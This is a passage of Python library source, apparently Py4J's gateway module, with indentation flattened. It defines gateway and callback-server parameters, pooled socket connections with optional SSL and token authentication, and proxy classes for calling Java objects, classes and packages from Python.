calls less efficient.
:param auto_close: if `True`, the connections created by the client
close the socket when they are garbage collected.
:param auto_convert: if `True`, try to automatically convert Python
objects like sequences and maps to Java Objects. Default value is
`False` to improve performance and because it is still possible to
explicitly perform this conversion.
:param eager_load: if `True`, the gateway tries to connect to the JVM
by calling System.currentTimeMillis. If the gateway cannot connect
to the JVM, it shuts down itself and raises an exception.
:param ssl_context: if not None, SSL connections will be made using
this SSLContext
:param enable_memory_management: if True, tells the Java side when a
JavaObject (reference to an object on the Java side) is garbage
collected on the Python side.
:param read_timeout: if > 0, sets a timeout in seconds after
which the socket stops waiting for a response from the Java side.
:param auth_token: if provided, an authentication that token clients
must provide to the server when connecting.
"""
self.address = address
self.port = port
self.auto_field = auto_field
self.auto_close = auto_close
self.auto_convert = auto_convert
self.eager_load = eager_load
self.ssl_context = ssl_context
self.enable_memory_management = enable_memory_management
self.read_timeout = read_timeout
self.auth_token = escape_new_line(auth_token)
class CallbackServerParameters(object):
"""Wrapper class that contains all parameters that can be passed to
configure a `CallbackServer`
"""
def __init__(
self, address=DEFAULT_ADDRESS, port=DEFAULT_PYTHON_PROXY_PORT,
daemonize=False, daemonize_connections=False, eager_load=True,
ssl_context=None,
accept_timeout=DEFAULT_ACCEPT_TIMEOUT_PLACEHOLDER,
read_timeout=None, propagate_java_exceptions=False,
auth_token=None):
"""
:param address: the address to which the client will request a
connection
:param port: the port to which the client will request a connection.
Default is 25333.
:param daemonize: If `True`, will set the daemon property of the server
thread to True. The callback server will exit automatically if all
the other threads exit.
:param daemonize_connections: If `True`, callback server connections
are executed in daemonized threads and will not block the exit of a
program if non daemonized threads are finished.
:param eager_load: If `True`, the callback server is automatically
started when the JavaGateway is created.
:param ssl_context: if not None, the SSLContext's certificate will be
presented to callback connections.
:param accept_timeout: if > 0, sets a timeout in seconds after which
the callbackserver stops waiting for a connection, sees if the
callback server should shut down, and if not, wait again for a
connection. The default is 5 seconds: this roughly means that
if can take up to 5 seconds to shut down the callback server.
:param read_timeout: if > 0, sets a timeout in seconds after
which the socket stops waiting for a call or command from the
Java side.
:param propagate_java_exceptions: if `True`, any `Py4JJavaError` raised
by a Python callback will cause the nested `java_exception` to be
thrown on the Java side. If `False`, the `Py4JJavaError` will
manifest as a `Py4JException` on the Java side, just as with any
other kind of Python exception. Setting this option is useful if
you need to implement a Java interface where the user of the
interface has special handling for specific Java exception types.
:param auth_token: if provided, an authentication token that clients
must provide to the server when connecting.
"""
self.address = address
self.port = port
self.daemonize = daemonize
self.daemonize_connections = daemonize_connections
self.eager_load = eager_load
self.ssl_context = ssl_context
if accept_timeout == DEFAULT_ACCEPT_TIMEOUT_PLACEHOLDER:
# This is to support deprecated function call...
# TODO Remove "DEFAULT" once we remove the deprecated function
# call.
accept_timeout = DEFAULT_CALLBACK_SERVER_ACCEPT_TIMEOUT
self.accept_timeout = accept_timeout
self.read_timeout = read_timeout
self.propagate_java_exceptions = propagate_java_exceptions
self.auth_token = escape_new_line(auth_token)
class DummyRLock(object):
def __init__(self):
pass
def acquire(self, blocking=1):
pass
def release(self):
pass
def __enter__(self):
pass
def __exit__(self, type, value, tb):
pass
class GatewayConnectionGuard(object):
def __init__(self, client, connection):
self._client = client
self._connection = connection
def __enter__(self):
return self
def read(self, hint=-1):
return self._connection.stream.read(hint)
def __exit__(self, type, value, traceback):
if value is None:
self._client._give_back_connection(self._connection)
else:
self._connection.close()
class GatewayClient(object):
"""Responsible for managing connections to the JavaGateway.
This implementation is thread-safe and connections are created on-demand.
This means that Py4J-Python can be accessed by multiple threads and
messages are sent to and processed concurrently by the Java Gateway.
When creating a custom :class:`JavaGateway`, it is recommended to pass an
instance of :class:`GatewayClient` instead of a :class:`GatewayConnection`:
both have the same interface, but the client supports multiple threads and
connections, which is essential when using callbacks. """
def __init__(
self, address=DEFAULT_ADDRESS, port=DEFAULT_PORT,
auto_close=True, gateway_property=None,
ssl_context=None, gateway_parameters=None):
"""
:param gateway_parameters: the set of parameters used to configure the
GatewayClient.
:param gateway_property: used to keep gateway preferences without a
cycle with the gateway
"""
if address != DEFAULT_ADDRESS:
deprecated("GatewayClient.address", "1.0", "GatewayParameters")
if port != DEFAULT_PORT:
deprecated("GatewayClient.port", "1.0", "GatewayParameters")
if not gateway_parameters:
gateway_parameters = GatewayParameters(
address=address, port=port, auto_close=auto_close,
ssl_context=ssl_context)
self.gateway_parameters = gateway_parameters
self.address = gateway_parameters.address
self.port = gateway_parameters.port
self.is_connected = True
self.auto_close = gateway_parameters.auto_close
self.gateway_property = gateway_property
self.ssl_context = gateway_parameters.ssl_context
self.deque = deque()
def garbage_collect_object(self, target_id):
"""Tells the Java side that there is no longer a reference to this
JavaObject on the Python side.
"""
if target_id != proto.ENTRY_POINT_OBJECT_ID and\
target_id != proto.GATEWAY_SERVER_OBJECT_ID and\
self.is_connected:
try:
self.send_command(
proto.MEMORY_COMMAND_NAME +
proto.MEMORY_DEL_SUBCOMMAND_NAME +
target_id +
"\ne\n")
except Exception:
logger.debug("Exception while garbage collecting an object",
exc_info=True)
def _get_connection(self):
if not self.is_connected:
raise Py4JNetworkError("Gateway is not connected.")
try:
connection = self.deque.pop()
except IndexError:
connection = self._create_connection()
return connection
def _create_connection(self):
connection = GatewayConnection(
self.gateway_parameters, self.gateway_property)
connection.start()
return connection
def _give_back_connection(self, connection):
try:
self.deque.append(connection)
except Exception:
logger.warning(
"Exception while giving back connection", exc_info=True)
def shutdown_gateway(self):
"""Sends a shutdown command to the gateway. This will close the
gateway server: all active connections will be closed. This may
be useful if the lifecycle of the Java program must be tied to
the Python program.
"""
logger.info("Shutdown gateway at "+str(self.address)+":"+str(self.port))
connection = self._get_connection()
try:
connection.shutdown_gateway()
self.close()
self.is_connected = False
except Py4JNetworkError:
logger.debug("Error while shutting down gateway.", exc_info=True)
self.shutdown_gateway()
def send_command(self, command, retry=True, binary=False):
"""Sends a command to the JVM. This method is not intended to be
called directly by Py4J users. It is usually called by
:class:`JavaMember` instances.
:param command: the `string` command to send to the JVM. The command
must follow the Py4J protocol.
:param retry: if `True`, the GatewayClient tries to resend a message
if it fails.
:param binary: if `True`, we won't wait for a Py4J-protocol response
from the other end; we'll just return the raw connection to the
caller. The caller becomes the owner of the connection, and is
responsible for closing the connection (or returning it this
`GatewayClient` pool using `_give_back_connection`).
:rtype: the `string` answer received from the JVM (The answer follows
the Py4J protocol). The guarded `GatewayConnection` is also returned
if `binary` is `True`.
"""
connection = self._get_connection()
try:
response = connection.send_command(command)
if binary:
return response, self._create_connection_guard(connection)
elif is_fatal_error(response):
connection.close(False)
else:
self._give_back_connection(connection)
except Py4JNetworkError as pne:
if connection:
reset = False
if isinstance(pne.cause, socket.timeout):
reset = True
connection.close(reset)
if self._should_retry(retry, connection, pne):
logging.info("Exception while sending command.", exc_info=True)
response = self.send_command(command, binary=binary)
else:
logging.exception(
"Exception while sending command.")
response = proto.ERROR
return response
def _create_connection_guard(self, connection):
return GatewayConnectionGuard(self, connection)
def _should_retry(self, retry, connection, pne=None):
return pne and pne.when == proto.ERROR_ON_SEND
def close(self):
"""Closes all currently opened connections.
This operation is not thread safe and is only a best effort strategy
to close active connections.
All connections are guaranteed to be closed only if no other thread
is accessing the client and no call is pending.
"""
size = len(self.deque)
for _ in range(0, size):
try:
connection = self.deque.pop()
quiet_close(connection)
except IndexError:
pass
def build_info(self):
gw_info = dict()
gw_info['object'] = str(self)
gw_info['nConnections'] = len(self.deque)
gw_info['readTimeout'] = self.gateway_parameters.read_timeout
connections = []
for connection in list(self.deque):
connection_info = dict()
connection_info['socket'] = id(connection.socket)
connection_info['isConnected'] = connection.is_connected
connections.append(connection_info)
gw_info['connections'] = connections
return gw_info
@classmethod
def build_new_session(cls, address, port, gateway_client, pool):
""" Build a new session, using the parameters of the given gateway_client.
We also copy objects from the given pool."""
# I update the callback client now
# I create a new one
auto_field = gateway_client.gateway_parameters.auto_field
auto_close = gateway_client.gateway_parameters.auto_close
auto_convert = gateway_client.gateway_parameters.auto_convert
eager_load = gateway_client.gateway_parameters.eager_load
ssl_context = gateway_client.gateway_parameters.ssl_context
enable_memory_management = gateway_client.gateway_parameters.enable_memory_management
read_timeout = gateway_client.gateway_parameters.read_timeout
auth_token = gateway_client.gateway_parameters.auth_token
gateway_parameters = GatewayParameters(
address=address, port=port,
auto_field=auto_field, auto_close=auto_close,
auto_convert=auto_convert, eager_load=eager_load,
ssl_context=ssl_context, enable_memory_management=enable_memory_management,
read_timeout=read_timeout, auth_token=auth_token)
# I build a new pool, with the entry point and a new jvm
gateway_property = JavaGateway.create_gateway_property(
gateway_parameters,
python_server_entry_point=None)
# take the entry point from the callback server pool
gateway_property.pool.put(pool[proto.ENTRY_POINT_OBJECT_ID], proto.ENTRY_POINT_OBJECT_ID)
# and this is our new pool
new_pool = gateway_property.pool
# ok create new client, with the input converters
new_gateway_client = JavaGateway.create_gateway_client(gateway_parameters,
gateway_property=gateway_property)
JavaGateway.setup_gateway_client(new_gateway_client)
# add the jvm to the gateway_client
jvm = JavaGateway.make_new_jvm_view(new_gateway_client,
name="JVM:"+str(address)+":"+str(port),
id=proto.DEFAULT_JVM_ID)
return GatewaySession(new_gateway_client, new_pool, jvm)
class GatewaySession(object):
def __init__(self, gw_client, pool, jvm):
self.gateway_client = gw_client
self.pool = pool
self.jvm = jvm
def address(self):
return self.gateway_client.address
def port(self):
return self.gateway_client.port
def close(self):
self.gateway_client.close()
def build_info(self):
return {
'address': self.gateway_client.address,
'port': self.gateway_client.port,
'gatewayClient': str(self.gateway_client),
'pool': str(self.pool),
'objects': self.pool.build_objects_info(),
'jvm': str(self.jvm)
}
class GatewaySessionPool(object):
""" A pool of active sessions, one per remote machine:port
I think GatewayClient should be named GatewaySession """
def __init__(self):
self.lock = RLock()
self.sessions = dict()
def put(self, gateway_session):
id = self.compute_id(gateway_session)
with self.lock:
if id in self.sessions.keys():
if not self.sessions[id] is gateway_session:
self.sessions[id].close()
self.sessions[id] = gateway_session
else:
self.sessions[id] = gateway_session
@classmethod
def compute_id(cls, gateway_session):
return cls.id_for(gateway_session.address(), gateway_session.port())
@classmethod
def id_for(cls, address, port):
return str(address)+":"+str(port)
def keys(self):
with self.lock:
return self.sessions.keys()
def __getitem__(self, key):
with self.lock:
return self.sessions[key]
def __delitem__(self, key):
with self.lock:
del(self.sessions[key])
def __contains__(self, id):
return id in self.sessions
def __len__(self):
with self.lock:
return len(self.sessions)
def build_info(self):
info = dict()
info['nSessions'] = len(self.sessions)
info['sessions'] = []
for _id, session in self.sessions.items():
info['sessions'].append(session.build_info())
return info
class GatewayConnection(object):
"""Default gateway connection (socket based) responsible for communicating
with the Java Virtual Machine."""
def __init__(self, gateway_parameters, gateway_property=None):
"""
:param gateway_parameters: the set of parameters used to configure the
GatewayClient.
:param gateway_property: contains gateway preferences to avoid a cycle
with gateway
"""
self.gateway_parameters = gateway_parameters
self.address = gateway_parameters.address
self.port = gateway_parameters.port
af_type = socket.getaddrinfo(self.address, self.port)[0][0]
self.socket = socket.socket(af_type, socket.SOCK_STREAM)
if gateway_parameters.read_timeout:
self.socket.settimeout(gateway_parameters.read_timeout)
if gateway_parameters.ssl_context:
self.socket = gateway_parameters.ssl_context.wrap_socket(
self.socket, server_hostname=self.address)
self.is_connected = False
self.auto_close = gateway_parameters.auto_close
self.gateway_property = gateway_property
self.wr = weakref.ref(
self,
lambda wr, socket_instance=self.socket:
_garbage_collect_connection and
_garbage_collect_connection(socket_instance))
def start(self):
"""Starts the connection by connecting to the `address` and the `port`
"""
try:
self.socket.connect((self.address, self.port))
self.stream = self.socket.makefile("rb")
self.is_connected = True
self._authenticate_connection()
except Py4JAuthenticationError:
logger.exception("Cannot authenticate with gateway server.")
raise
except Exception as e:
msg = "An error occurred while trying to connect to the Java "\
"server ({0}:{1})".format(self.address, self.port)
logger.info(msg)
logger.exception(msg)
raise Py4JNetworkError(msg, e)
def _authenticate_connection(self):
if self.gateway_parameters.auth_token:
cmd = "{0}\n{1}\n".format(
proto.AUTH_COMMAND_NAME,
self.gateway_parameters.auth_token
)
answer = self.send_command(cmd)
error, _ = proto.is_error(answer)
if error:
# At this point we do not expect the caller to clean
# the connection so we clean ourselves.
self.close(reset=True)
raise Py4JAuthenticationError(
"Failed to authenticate with gateway server.")
def close(self, reset=False):
"""Closes the connection by closing the socket.
If reset is True, sends a RST packet with SO_LINGER
"""
if reset:
set_linger(self.socket)
else:
# Sent shut down before attempting to close a stream or socket.
quiet_shutdown(self.socket)
quiet_close(self.stream)
quiet_close(self.socket)
self.is_connected = False
def shutdown_gateway(self):
"""Sends a shutdown command to the gateway. This will close the gateway
server: all active connections will be closed. This may be useful
if the lifecycle of the Java program must be tied to the Python
program.
"""
if not self.is_connected:
raise Py4JError("Gateway must be connected to send shutdown cmd.")
try:
quiet_close(self.stream)
self.socket.sendall(
proto.SHUTDOWN_GATEWAY_COMMAND_NAME.encode("utf-8"))
quiet_close(self.socket)
self.is_connected = False
except Exception:
# Do nothing! Exceptions might occur anyway.
logger.debug("Exception occurred while shutting down gateway",
exc_info=True)
def send_command(self, command):
"""Sends a command to the JVM. This method is not intended to be
called directly by Py4J users: it is usually called by JavaMember
instances.
:param command: the `string` command to send to the JVM. The command
must follow the Py4J protocol.
:rtype: the `string` answer received from the JVM (The answer follows
the Py4J protocol).
"""
logger.debug("Command to send: {0}".format(command))
try:
# Write will only fail if remote is closed for large payloads or
# if it sent a RST packet (SO_LINGER)
self.socket.sendall(command.encode("utf-8"))
except Exception as e:
logger.info("Error while sending.", exc_info=True)
raise Py4JNetworkError(
"Error while sending", e, proto.ERROR_ON_SEND)
try:
answer = smart_decode(self.stream.readline()[:-1])
logger.debug("Answer received: {0}".format(answer))
if answer.startswith(proto.RETURN_MESSAGE):
answer = answer[1:]
# Happens when a the other end is dead. There might be an empty
# answer before the socket raises an error.
if answer.strip() == "":
raise Py4JNetworkError("Answer from Java side is empty")
return answer
except Exception as e:
logger.info("Error while receiving.", exc_info=True)
raise Py4JNetworkError(
"Error while receiving", e, proto.ERROR_ON_RECEIVE)
class JavaMember(object):
"""Represents a member (i.e., method) of a :class:`JavaObject`. For now,
only methods are supported. Fields are retrieved directly and are not
contained in a JavaMember.
"""
def __init__(self, name, container, target_id, gateway_client):
self.name = name
self.container = container
self.target_id = target_id
self.gateway_client = gateway_client
self.command_header = self.target_id + "\n" + self.name + "\n"
self.pool = self.gateway_client.gateway_property.pool
self.converters = self.gateway_client.converters
self._gateway_doc = None
@property
def __doc__(self):
# The __doc__ string is used by IPython/PyDev/etc to generate
# help string, therefore provide useful help
if self._gateway_doc is None:
self._gateway_doc = gateway_help(
self.gateway_client, self, display=False)
return self._gateway_doc
def _get_args(self, args):
temp_args = []
new_args = []
for arg in args:
if not isinstance(arg, JavaObject):
for converter in self.gateway_client.converters:
if converter.can_convert(arg):
temp_arg = converter.convert(arg, self.gateway_client)
temp_args.append(temp_arg)
new_args.append(temp_arg)
break
else:
new_args.append(arg)
else:
new_args.append(arg)
return (new_args, temp_args)
def _build_args(self, *args):
if self.converters is not None and len(self.converters) > 0:
(new_args, temp_args) = self._get_args(args)
else:
new_args = args
temp_args = []
args_command = "".join(
[get_command_part(arg, self.pool) for arg in new_args])
return args_command, temp_args
def stream(self, *args):
"""
Call the method using the 'binary' protocol.
:rtype: The `GatewayConnection` that the call command was sent to.
"""
args_command, temp_args = self._build_args(*args)
command = proto.STREAM_COMMAND_NAME +\
self.command_header +\
args_command +\
proto.END_COMMAND_PART
answer, connection = self.gateway_client.send_command(
command, binary=True)
# parse the return value to throw an exception if necessary
get_return_value(
answer, self.gateway_client, self.target_id, self.name)
for temp_arg in temp_args:
temp_arg._detach()
return connection
def __call__(self, *args):
args_command, temp_args = self._build_args(*args)
command = proto.CALL_COMMAND_NAME +\
self.command_header +\
args_command +\
proto.END_COMMAND_PART
answer = self.gateway_client.send_command(command)
return_value = get_return_value(
answer, self.gateway_client, self.target_id, self.name)
for temp_arg in temp_args:
temp_arg._detach()
return return_value
class JavaObject(object):
"""Represents a Java object from which you can call methods or access
fields."""
def __init__(self, target_id, gateway_client):
"""
:param target_id: the identifier of the object on the JVM side. Given
by the JVM.
:param gateway_client: the gateway client used to communicate with
the JVM.
"""
self._target_id = target_id
self._gateway_client = gateway_client
self._auto_field = gateway_client.gateway_property.auto_field
self._methods = {}
self._field_names = set()
self._fully_populated = False
self._gateway_doc = None
key = smart_decode(self._gateway_client.address) +\
smart_decode(self._gateway_client.port) +\
self._target_id
if self._gateway_client.gateway_property.enable_memory_management:
value = weakref.ref(
self,
lambda wr, cc=self._gateway_client, id=self._target_id:
_garbage_collect_object and _garbage_collect_object(cc, id))
ThreadSafeFinalizer.add_finalizer(key, value)
def _detach(self):
_garbage_collect_object(self._gateway_client, self._target_id)
def _get_object_id(self):
return self._target_id
@property
def __doc__(self):
# The __doc__ string is used by IPython/PyDev/etc to generate
# help string, therefore provide useful help
if self._gateway_doc is None:
self._gateway_doc = gateway_help(
self._gateway_client, self, display=False)
return self._gateway_doc
def __getattr__(self, name):
if name == "__call__":
# Provide an explicit definition for __call__ so that a JavaMember
# does not get created for it. This serves two purposes:
# 1) IPython (and others?) stop showing incorrect help indicating
# that this is callable
# 2) A TypeError(object not callable) is raised if someone does try
# to call here
raise AttributeError
if name not in self._methods:
if (self._auto_field):
(is_field, return_value) = self._get_field(name)
if (is_field):
self._field_names.add(name)
return return_value
# Theoretically, not thread safe, but the worst case scenario is
# cache miss or double overwrite of the same method...
self._methods[name] = JavaMember(
name, self, self._target_id, self._gateway_client)
# The name is a method
return self._methods[name]
def __dir__(self):
self._populate_fields()
return list(set(self._methods.keys()) | self._field_names)
def _populate_fields(self):
# Theoretically, not thread safe, but the worst case scenario is
# cache miss or double overwrite of the same method...
if not self._fully_populated:
if self._auto_field:
command = proto.DIR_COMMAND_NAME +\
proto.DIR_FIELDS_SUBCOMMAND_NAME +\
self._target_id + "\n" +\
proto.END_COMMAND_PART
answer = self._gateway_client.send_command(command)
return_value = get_return_value(
answer, self._gateway_client, self._target_id, "__dir__")
self._field_names.update(return_value.split("\n"))
command = proto.DIR_COMMAND_NAME +\
proto.DIR_METHODS_SUBCOMMAND_NAME +\
self._target_id + "\n" +\
proto.END_COMMAND_PART
answer = self._gateway_client.send_command(command)
return_value = get_return_value(
answer, self._gateway_client, self._target_id, "__dir__")
names = return_value.split("\n")
for name in names:
if name not in self._methods:
self._methods[name] = JavaMember(
name, self, self._target_id, self._gateway_client)
self._fully_populated = True
def _get_field(self, name):
command = proto.FIELD_COMMAND_NAME +\
proto.FIELD_GET_SUBCOMMAND_NAME +\
self._target_id + "\n" +\
name + "\n" +\
proto.END_COMMAND_PART
answer = self._gateway_client.send_command(command)
if answer == proto.NO_MEMBER_COMMAND or is_error(answer)[0]:
return (False, None)
else:
return_value = get_return_value(
answer, self._gateway_client, self._target_id, name)
return (True, return_value)
def __eq__(self, other):
if other is None:
return False
elif (hasattr2(other, "_get_object_id")):
return self.equals(other)
else:
return other.__eq__(self)
def __hash__(self):
return self.hashCode()
def __str__(self):
return self.toString()
def __repr__(self):
# For now...
return "JavaObject id=" + self._target_id
class JavaClass(object):
"""A `JavaClass` represents a Java Class from which static members can be
retrieved. `JavaClass` instances are also needed to initialize an array.
Usually, `JavaClass` are not initialized using their constructor, but
they are created while accessing the `jvm` property of a gateway, e.g.,
`gateway.jvm.java.lang.String`.
"""
def __init__(self, fqn, gateway_client):
self._fqn = fqn
self._gateway_client = gateway_client
self._pool = self._gateway_client.gateway_property.pool
self._command_header = fqn + "\n"
self._converters = self._gateway_client.converters
self._gateway_doc = None
self._statics = None
@property
def __doc__(self):
# The __doc__ string is used by IPython/PyDev/etc to generate
# help string, therefore provide useful help
if self._gateway_doc is None:
self._gateway_doc = gateway_help(
self._gateway_client, self, display=False)
return self._gateway_doc
def __dir__(self):
# Theoretically, not thread safe, but the worst case scenario is
# cache miss or double overwrite of the same method...
if self._statics is None:
command = proto.DIR_COMMAND_NAME +\
proto.DIR_STATIC_SUBCOMMAND_NAME +\
self._fqn + "\n" +\
proto.END_COMMAND_PART
answer = self._gateway_client.send_command(command)
return_value = get_return_value(
answer, self._gateway_client, self._fqn, "__dir__")
self._statics = return_value.split("\n")
return self._statics[:]
@property
def _java_lang_class(self):
"""Gets the java.lang.Class of the current JavaClass. This is
equivalent to calling .class in Java.
"""
command = proto.REFLECTION_COMMAND_NAME +\
proto.REFL_GET_JAVA_LANG_CLASS_SUB_COMMAND_NAME +\
self._fqn + "\n" + proto.END_COMMAND_PART
answer = self._gateway_client.send_command(command)
if len(answer) > 1 and answer[0] == proto.SUCCESS:
return get_return_value(
answer, self._gateway_client, self._fqn, "_java_lang_class")
else:
raise Py4JError(
"{0} does not exist in the JVM".format(self._fqn))
def __getattr__(self, name):
if name in ["__str__", "__repr__"]:
raise AttributeError
command = proto.REFLECTION_COMMAND_NAME +\
proto.REFL_GET_MEMBER_SUB_COMMAND_NAME +\
self._fqn + "\n" +\
name + "\n" +\
proto.END_COMMAND_PART
answer = self._gateway_client.send_command(command)
if len(answer) > 1 and answer[0] == proto.SUCCESS:
if answer[1] == proto.METHOD_TYPE:
return JavaMember(
name, None, proto.STATIC_PREFIX + self._fqn,
self._gateway_client)
elif answer[1].startswith(proto.CLASS_TYPE):
return JavaClass(
self._fqn + "$" + name, self._gateway_client)
else:
return get_return_value(
answer, self._gateway_client, self._fqn, name)
else:
raise Py4JError(
"{0}.{1} does not exist in the JVM".format(self._fqn, name))
def _get_args(self, args):
temp_args = []
new_args = []
for arg in args:
if not isinstance(arg, JavaObject):
for converter in self._converters:
if converter.can_convert(arg):
temp_arg = converter.convert(arg, self._gateway_client)
temp_args.append(temp_arg)
new_args.append(temp_arg)
break
else:
new_args.append(arg)
else:
new_args.append(arg)
return (new_args, temp_args)
def __call__(self, *args):
# TODO Refactor to use a mixin shared by JavaMember and JavaClass
if self._converters is not None and len(self._converters) > 0:
(new_args, temp_args) = self._get_args(args)
else:
new_args = args
temp_args = []
args_command = "".join(
[get_command_part(arg, self._pool) for arg in new_args])
command = proto.CONSTRUCTOR_COMMAND_NAME +\
self._command_header +\
args_command +\
proto.END_COMMAND_PART
answer = self._gateway_client.send_command(command)
return_value = get_return_value(
answer, self._gateway_client, None, self._fqn)
for temp_arg in temp_args:
temp_arg._detach()
return return_value
class UserHelpAutoCompletion(object):
"""
Type a package name or a class name.
For example with a JVMView called view:
>>> o = view.Object() # create a java.lang.Object
>>> random = view.jvm.java.util.Random() # create a java.util.Random
The default JVMView is in the gateway and is called:
>>> gateway.jvm
By default, java.lang.* is available in the view. To
add additional Classes/Packages, do:
>>> from py4j.java_gateway import java_import
>>> java_import(gateway.jvm, "com.example.Class1")
>>> instance = gateway.jvm.Class1()
Package and class completions are only available for
explicitly imported Java classes. For example, if you
java_import(gateway.jvm, "com.example.Class1")
then Class1 will appear in the completions.
"""
KEY = "<package or class name>"
class JavaPackage(object):
"""A `JavaPackage` represents part of a Java package from which Java
classes can be accessed.
Usually, `JavaPackage` are not initialized using their constructor, but
they are created while accessing the `jvm` property of a gateway, e.g.,
`gateway.jvm.java.lang`.
"""
def __init__(self, fqn, gateway_client, jvm_id=None):
self._fqn = fqn
self._gateway_client = gateway_client
if jvm_id is None:
self._jvm_id = proto.DEFAULT_JVM_ID
self._jvm_id = jvm_id
def __dir__(self):
return [UserHelpAutoCompletion.KEY]
def __getattr__(self, name):
if name == UserHelpAutoCompletion.KEY:
return UserHelpAutoCompletion
if name in ["__str__", "__repr__"]:
raise AttributeError
if name == "__call__":
raise Py4JError("Trying to call a package.")
new_fqn = self._fqn + "." + name
command = proto.REFLECTION_COMMAND_NAME +\
proto.REFL_GET_UNKNOWN_SUB_COMMAND_NAME +\
new_fqn + "\n" +\
self._jvm_id + "\n" +\
proto.END_COMMAND_PART
answer = self._gateway_client.send_command(command)
if answer == proto.SUCCESS_PACKAGE:
return JavaPackage(new_fqn, self._gateway_client, self._jvm_id)
elif answer.startswith(proto.SUCCESS_CLASS):
return JavaClass(
answer[proto.CLASS_FQN_START:], self._gateway_client)
else:
raise Py4JError("{0} does not exist in the JVM".format(new_fqn))
class JVMView(object):
"""A `JVMView` allows access to the Java Virtual Machine of a
`JavaGateway`.
This can be used to reference static members (fields and methods) and
to call constructors.
"""
def __init__(self, gateway_client, jvm_name, id=None, jvm_object=None):
self._gateway_client = gateway_client
self._jvm_name = jvm_name
if id is not None:
self._id = id
elif jvm_object is not None:
self._id = proto.REFERENCE_TYPE + jvm_object._get_object_id()
# So that both JVMView instances (on Python and Java) have the
# same lifecycle. Theoretically, JVMView could inherit from
# JavaObject, but I would like to avoid the use of reflection
# for regular Py4J classes.
self._jvm_object = jvm_object
self._dir_sequence_and_cache = (None, [])
def __dir__(self):
command = proto.DIR_COMMAND_NAME +\
proto.DIR_JVMVIEW_SUBCOMMAND_NAME +\
self._id + "\n" +\
get_command_part(self._dir_sequence_and_cache[0]) +\
proto.END_COMMAND_PART
answer = self._gateway_client.send_command(command)
return_value = get_return_value(
answer, self._gateway_client, self._fqn, "__dir__")
if return_value is not None:
result = return_value.split("\n")
# Theoretically, not thread safe, but the worst case scenario is
# cache miss or double overwrite of the same method...
self._dir_sequence_and_cache = (
result[0], result[1:] + [UserHelpAutoCompletion.KEY])
return self._dir_sequence_and_cache[1][:]
def __getattr__(self, name):
if name == UserHelpAutoCompletion.KEY:
return UserHelpAutoCompletion()
answer = self._gateway_client.send_command(
proto.REFLECTION_COMMAND_NAME +
proto.REFL_GET_UNKNOWN_SUB_COMMAND_NAME + name + "\n" + self._id +
"\n" + proto.END_COMMAND_PART)
if answer == proto.SUCCESS_PACKAGE:
return JavaPackage(name, self._gateway_client, jvm_id=self._id)
elif answer.startswith(proto.SUCCESS_CLASS):
return JavaClass(
answer[proto.CLASS_FQN_START:], self._gateway_client)
else:
_, error_message = get_error_message(answer)
message = compute_exception_message(
"{0} does not exist in the JVM".format(name), error_message)
raise Py4JError(message)
class GatewayProperty(object):
"""Object shared by callbackserver, gateway, and connections.
"""
def __init__(self, auto_field, pool, enable_memory_management=True):
self.auto_field = auto_field
self.pool = pool
self.enable_memory_management = enable_memory_management
class JavaGateway(object):
"""A `JavaGateway` is the main interaction point between a Python VM and
a JVM.
* A `JavaGateway` instance is connected to a `Gateway` instance on the
Java side.
* The `entry_point` field of a `JavaGateway` instance is connected to
the `Gateway.entryPoint` instance on the Java side.
* The `java_gateway_server` field of a `JavaGateway` instance is connected
to the `GatewayServer` instance on the Java side.
* The `jvm` field of `JavaGateway` enables user to access classes, static
members (fields and methods) and call constructors.
Methods that are not defined by `JavaGateway` are always redirected to
`entry_point`. For example, ``gateway.doThat()`` is equivalent to
``gateway.entry_point.doThat()``. This is a trade-off between convenience
and potential confusion.
"""
def __init__(
self, gateway_client=None, auto_field=False,
python_proxy_port=DEFAULT_PYTHON_PROXY_PORT,
start_callback_server=False, auto_convert=False, eager_load=False,
gateway_parameters=None, callback_server_parameters=None,
python_server_entry_point=None):
"""
:param gateway_parameters: An instance of `GatewayParameters` used to
configure the various options of the gateway.
:param callback_server_parameters: An instance of
`CallbackServerParameters` used to configure various options of the
gateway server. Must be provided to start a gateway server.
Otherwise, callbacks won"t be available.
:param python_server_entry_point: can be requested by the Java side if
Java is driving the communication.
"""
# a pool of sessions
self.sessions_pool = GatewaySessionPool()
self.gateway_parameters = gateway_parameters
if not gateway_parameters:
self.gateway_parameters = GatewayParameters(
auto_field=auto_field, auto_convert=auto_convert,
eager_load=eager_load)
self.callback_server_parameters = callback_server_parameters
if not callback_server_parameters:
# No parameters were provided so do not autostart callback server.
# TODO BASE 64
raw_token = unescape_new_line(self.gateway_parameters.auth_token)
self.callback_server_parameters = CallbackServerParameters(
port=python_proxy_port, eager_load=False,
auth_token=raw_token)
# Check for deprecation warnings
if auto_field:
deprecated("JavaGateway.auto_field", "1.0", "GatewayParameters")
if auto_convert:
deprecated("JavaGateway.auto_convert", "1.0", "GatewayParameters")
if eager_load:
deprecated("JavaGateway.eager_load", "1.0", "GatewayParameters")
if start_callback_server:
deprecated(
"JavaGateway.start_callback_server and python_proxy_port",
"1.0", "CallbackServerParameters")
self.callback_server_parameters.eager_load = True
if gateway_client:
deprecated("JavaGateway.gateway_client", "1.0",
"GatewayParameters")
else:
gateway_client = JavaGateway.create_gateway_client(self.gateway_parameters)
self.python_server_entry_point = python_server_entry_point
self._python_proxy_port = python_proxy_port
self.gateway_property = JavaGateway.create_gateway_property(
self.gateway_parameters,
python_server_entry_point=self.python_server_entry_point)
# Setup gateway client
self.set_gateway_client(gateway_client)
# Setup callback server property
self._callback_server = None
if self.gateway_parameters.eager_load:
self._eager_load()
if self.callback_server_parameters.eager_load:
self.start_callback_server(self.callback_server_parameters)
@classmethod
def create_gateway_client(cls, gateway_parameters, gateway_property=None):
gateway_client = GatewayClient(
gateway_parameters=gateway_parameters,
gateway_property=gateway_property)
return gateway_client
@classmethod
def create_gateway_property(cls, gateway_parameters, python_server_entry_point=None):
gateway_property = GatewayProperty(
gateway_parameters.auto_field, PythonProxyPool(),
gateway_parameters.enable_memory_management)
if python_server_entry_point:
gateway_property.pool.put(
python_server_entry_point, proto.ENTRY_POINT_OBJECT_ID)
return gateway_property
def set_gateway_client(self, gateway_client):
"""Sets the gateway client for this JavaGateway. This sets the
appropriate gateway_property and resets the main jvm view (self.jvm).
This is for advanced usage only. And should only be set before the
gateway is loaded.
"""
gateway_client.gateway_property = self.gateway_property
self._gateway_client = JavaGateway.setup_gateway_client(gateway_client)
self.entry_point = JavaObject(
proto.ENTRY_POINT_OBJECT_ID, self._gateway_client)
self.java_gateway_server = JavaObject(
proto.GATEWAY_SERVER_OBJECT_ID, self._gateway_client)
